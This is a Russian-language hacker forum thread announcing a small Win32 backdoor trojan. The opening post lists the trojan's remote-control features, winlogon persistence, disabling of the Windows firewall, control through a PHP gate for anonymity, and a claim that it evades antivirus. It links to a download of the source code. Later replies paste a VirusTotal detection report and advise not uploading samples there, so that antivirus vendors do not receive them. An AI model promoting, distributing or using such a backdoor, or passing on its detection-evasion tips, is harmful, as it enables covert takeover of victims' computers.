ScriptKid BackDoor v0.01 beta by _1nf3ct0r_

[Dr0ne]

ScriptKid BackDoor v0.01 beta by _1nf3ct0r_
- это многофункциональный бэкдор под Win32-системы, работающий по
архитектуре "клиент-сервер", с помощью которого можно практически полностью контролировать
зараженную систему.
Возможности:
- Выполнять любые команды в системе через коммандный интерпретатор cmd.exe
- Работа с файловой системой через cmd.exe
- Запускать любые программы в системе
- Выводить свое сообщение
- Выключать/Перезагужать/Завершить сеанс зараженной машины
- Закрывать/Открывать CD-ROM
- Включать/Выключать монитор
- Устанавливать свои собственные обои
- Выставлять мышь на левшу/правшу
- Установка курсора в разные координаты
- Включать/Выключать Scroll Lock, Num Lock, Caps Lock на клавиатуре
- Прятать кнопку "ПУСК", панель со свернутыми окнами, Quick Launch, часы, трей и т.д
Фичи:
- Автозагрузка из под winlogon (Userinit).
- Вырубает встроенный Windows-файрвол (ICF/ICS и WSCSVC), который блокирует коннекты к машине.
- Управление зараженной машиной через PHP-гейт. Теперь об анонимности можно беспокоиться в два раза меньше.
- Маленький размер сервера. Всего ~5 килобайт (4,90).
- На момент релиза, ни один антивирус не определил троянский код. Проверено на virustotal.com
код очень сырой, собственно исходники и мануал в архиве.

сорцы находяться тут - http://hellknights.void.ru/releases/scbdbeta.rar

 

[Nick1978]

Уже к сожалению детектиться:
STATUS: FINISHEDComplete scanning result of "scbdbeta.rar", received in VirusTotal at 08.29.2006, 15:57:16 (CET).

Antivirus Version Update Result
AntiVir 6.35.1.3 08.29.2006 no virus found
Authentium 4.93.8 08.29.2006 no virus found
Avast 4.7.844.0 08.28.2006 no virus found
AVG 386 08.29.2006 no virus found
BitDefender 7.2 08.29.2006 BehavesLikerojan.UserStartup
CAT-QuickHeal 8.00 08.29.2006 (Suspicious) - DNAScan
ClamAV devel-20060426 08.29.2006 no virus found
DrWeb 4.33 08.29.2006 BackDoor.Kiddy
eTrust-InoculateIT 23.72.109 08.29.2006 no virus found
eTrust-Vet 30.3.3047 08.29.2006 no virus found
Ewido 4.0 08.25.2006 no virus found
Fortinet 2.77.0.0 08.29.2006 PossibleThreat!09107
F-Prot 3.16f 08.25.2006 no virus found
F-Prot4 4.2.1.29 08.26.2006 Possibly a new unknown PE_Virus!Maximus
Ikarus 0.2.65.0 08.29.2006 no virus found
Kaspersky 4.0.2.24 08.29.2006 no virus found
McAfee 4839 08.28.2006 no virus found
Microsoft 1.1560 08.29.2006 no virus found
NOD32v2 1.1729 08.28.2006 probably unknown NewHeur_PE virus
Norman 5.90.23 08.29.2006 no virus found
Panda 9.0.0.4 08.29.2006 Suspicious file
Sophos 4.08.0 08.29.2006 no virus found
Symantec 8.0 08.29.2006 no virus found
TheHacker 5.9.8.201 08.28.2006 W32/SdBot(2).worm.gen
UNA 1.83 08.29.2006 no virus found
VBA32 3.11.1 08.28.2006 no virus found
VirusBuster 4.3.7:9 08.29.2006 no virus found


Aditional Information
File size: 103784 bytes
MD5: 1d1db7dbbd7e0af8e4bdbe7a352a1c51
SHA1: 648f3161cd1180751caf17794bb86fd9671ae2f2
packers: FSG

 

[Dr0ne]

навирус тотале не тесть никогда. они полюбому отсылают антивирам на разборы.
сделай как я - поставь себе 3 антивира и не парься: доктор Вэб, Каспер 6 и НОД. и все будет норм

 

[system(#036;cmd)]

стоит посмореть только сырцы. бэкдоры - прошлый век, имхо

 

[BAY]

2system($cmd): раскажи че в моде нынче?

 

[qwe113]

-----

 

[b4iter]

Полноценно может работать только 1 антивир, остальные можно юзать только для сканирования, монитор прийдеться выключить

 

[Dr0ne]

b4iter
привильно говоришь. я выключил все эвристики кроме НОДа и все норм пашет

 

[admindan]

Да кстати интересный экземпляр, но к сожалению палиться Вантузовским фаером. Следовательнно и антивирями тоже

 

[lance]

3 антивируса =)
Пожалей комп. Я когда пр тупости поставил каспера и ещё какой-то антивирь, так они друг другу пытались праваа понизить и комп жутко тормозил (грузился минут по 20, а потом просто вис).

 

[Dr0ne]

lance

я выключил все эвристики кроме НОДа и все норм пашет

ты читай внимательнай. тем более что у меня комп старый и еле работает